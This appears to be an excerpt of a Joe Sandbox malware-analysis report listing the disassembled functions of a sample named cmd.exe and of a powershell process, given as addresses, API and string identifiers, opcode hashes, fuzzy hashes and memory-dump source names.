                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                      • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                      • Instruction ID: f7d472fa0ab7fb858e34d7b51508e409ea92aef7c086cba2f52aa53d7f71aaf8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A51AD23E086418AFB10EF71D8507BDA3A1BF48B98F948475DE0D97688DF78E441CB20
                                                                                                                                                                                                                                      Function 00007FF70AEF20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1956198572-0
                                                                                                                                                                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                      • Instruction ID: 67ec9ca8c9aac5dac2240bcafed91b841ab397454d372b8cfc6c479855f0ae3b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C11CC23F1C14782FA54BB69ED452FA9251EF88780FC48170DB4907B99CF3DE9D58614
                                                                                                                                                                                                                                      Function 00007FF70AF15B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: ?
                                                                                                                                                                                                                                      • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                      • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                      • Instruction ID: 2e09f346d99630f8c97a0bbb2454904ad2f4cb631d91d00360c50a896e91f34c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B41F813A1868246FB24AB25D84177AE690EFD0BA4F944275EF9C47BD5DF3CE442C710
                                                                                                                                                                                                                                      Function 00007FF70AF09084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF70AF090B6
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AF0A9B8: GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF70AEFCC15), ref: 00007FF70AF090D4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                      • API String ID: 3580290477-1295598952
                                                                                                                                                                                                                                      • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                      • Instruction ID: c81169df433b27a12e1cc1c9132f3532a980379d33cd2575e86bc7340386c5bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53414A77A08B1286FB14BF25EC904B9A694EF447D0F954075EA4E83B86DF38F4818360
                                                                                                                                                                                                                                      Function 00007FF70AF0CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                      • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                      • Instruction ID: 282fe5029c600d15c771a1b98e9ef68149c2679d4dcc29aea0be631f16950fa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41B433B19A4581EB20EF25E8447A9A761FB98794F904131EE4D87B98EF3CE411C750
                                                                                                                                                                                                                                      Function 00007FF70AF0F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory
                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                      • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                      • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                      • Instruction ID: 975b8aa5349b7fe59d4f8252c5df83cf76329deb64f6c62841b581adffe15933
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC21D263B0828182FB30AB11D84466DA3B2FF84B84FD58079DA8D83694DF7CF9458B60
                                                                                                                                                                                                                                      Function 00007FF70AEFFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                      • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                      • Instruction ID: 1d4f60ea1517fe62c7f16b6b65d17bc74f20ff4617534eb4d523170d01f06559
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB112B32619B8182EB659F15F840269B7E4FF88B98F984274DA8D07769EF3CD551CB00
                                                                                                                                                                                                                                      Function 00007FF70AF107AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                      • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                      • Instruction ID: 7e48712c4139e80ea67360a01ad329de592c93811834805290254f6a9369c430
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35014F23A1C20786FB20BF60D86627EA3A0EF48789FD50076D65D86795DF2CF5448B24

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 00007FFD98C33428 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: /S^
                                                                                                                                                                                                                                      • API String ID: 0-1735012625
                                                                                                                                                                                                                                      • Opcode ID: d93727c7e34d574bdddb246dee9e198fcde7a703980b348b7be8fed6197a60ff
                                                                                                                                                                                                                                      • Instruction ID: 2589572e17c27cbaea3305191c5b96a146723e3b944a25ce412b68a622ab55f3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93727c7e34d574bdddb246dee9e198fcde7a703980b348b7be8fed6197a60ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF319377B0D7D24FE3674BB868760A87FA0EF5362074A01FBC4C58B4A3E41618078765
                                                                                                                                                                                                                                      Function 00007FFD98D041D8 Relevance: .8, Instructions: 836COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 5f594d6b8853f9707bbfbd275b483eb90b26d2acfacaf77ce61f301908c3efcd
                                                                                                                                                                                                                                      • Instruction ID: 41d6a9143634b08faf379904a7b6da7c197e17cc1a27f7213ad8116de9a7ad1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f594d6b8853f9707bbfbd275b483eb90b26d2acfacaf77ce61f301908c3efcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8322822B0E7C60FE7669B7858259B47FE1EF56624B8901FBD08DC70D3D918AC09C396
                                                                                                                                                                                                                                      Function 00007FFD98D067F5 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c6406afb17310796f71a4c3a1d95a1f123cf8f98bbdb3d56058c2605e58905a0
                                                                                                                                                                                                                                      • Instruction ID: 9d7d3a5b28aa7910c7d598cd67aa7503eba57a849154eb5e5a843f196ec57d6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6406afb17310796f71a4c3a1d95a1f123cf8f98bbdb3d56058c2605e58905a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EAD13932B0EBCA0FEBA5EFA868655B57BA0EF46710B4801FED05DC70D3D918A809C355
                                                                                                                                                                                                                                      Function 00007FFD98C39880 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fbeb42baebd59b61def939edf4ba6a8173ee105b9f542a2e74edbb0f0b96e870
                                                                                                                                                                                                                                      • Instruction ID: 62fd203b7262ad629dfdc57aaa0cb3733ea020efa8290c1752aebaa937fce530
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbeb42baebd59b61def939edf4ba6a8173ee105b9f542a2e74edbb0f0b96e870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B310671A1CB484FDB189B5CDC466B97BE0FB99310F00426FE449D3292CA70B856CBC2
                                                                                                                                                                                                                                      Function 00007FFD98D0429F Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5e49e2cf7fbcd83e328f86a3abe3bc0a0b6add40544ac34c8239ec3fde932f0
                                                                                                                                                                                                                                      • Instruction ID: a9030f1633afc84936f1b6e02336a82db55d86a5923b3188c9db72c166ef60e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5e49e2cf7fbcd83e328f86a3abe3bc0a0b6add40544ac34c8239ec3fde932f0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B21D422B4EAC70FE7B5DE68446197866C2EF547147D921BAD04DC31E2DE18AC088349
                                                                                                                                                                                                                                      Function 00007FFD98D0459C Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1948337678.00007FFD98D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98D00000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98d00000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d7d486b3e8cb9b58163fad89264b137bb4a4b4c98a9495f7ec067f62dd8b531f
                                                                                                                                                                                                                                      • Instruction ID: ba05188af662782edf538ab8910faffa0a0bc60e60829cd1a04d7e5008ae36c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d7d486b3e8cb9b58163fad89264b137bb4a4b4c98a9495f7ec067f62dd8b531f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D511E332F0E5C60FE7B5EE6854789B47BD2EF01A24BC911FAD09DC7096E919AC088345
                                                                                                                                                                                                                                      Function 00007FFD98B1EBFF Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1946176642.00007FFD98B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98B1D000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98b1d000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                                      • Instruction ID: 9c0e9408a1dff8f61d8a322dca6f4dea372fe6bccb9cff7f4c49214ff08a8762
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B014F3160CE088F9AA8EF1DE48595237E0FB98321710065AD41EC755AD731F891CBC5
                                                                                                                                                                                                                                      Function 00007FFD98C333B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                      • Instruction ID: b03a4346f22c50042c3e3a543cd057065c0f21f4a9650730cdfb5a1887b4614f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2701A73120CB0C4FD744EF0CE051AA5B3E0FB85320F10052EE58AC3691DA32E882CB46
                                                                                                                                                                                                                                      Function 00007FFD98C3A21B Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7cd4a35e7127d5f5baf46144615dc5e6a211a4a51542be74970840f29657bc91
                                                                                                                                                                                                                                      • Instruction ID: 8586bcc3108c90a655bed744f041c5c99615412c5513799a09c0374666f08bb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cd4a35e7127d5f5baf46144615dc5e6a211a4a51542be74970840f29657bc91
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CE01A35804A4C8FCB54EF18C8598E97BA0FB68201B01429BE81DC7121DB729958CBC2

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 00007FFD98C38BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000A.00000002.1947344628.00007FFD98C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD98C30000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffd98c30000_powershell.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                                                                                                                                                      • API String ID: 0-4116931533
                                                                                                                                                                                                                                      • Opcode ID: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
                                                                                                                                                                                                                                      • Instruction ID: 9ccd26a9974aed0b8c04a07ac9087a9ae32d7d0be93a8dad7808aa221081ab97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8201c494a57edf1f917aa58f11816ee0842afcba423ac7bfc73ad6212f0e6841
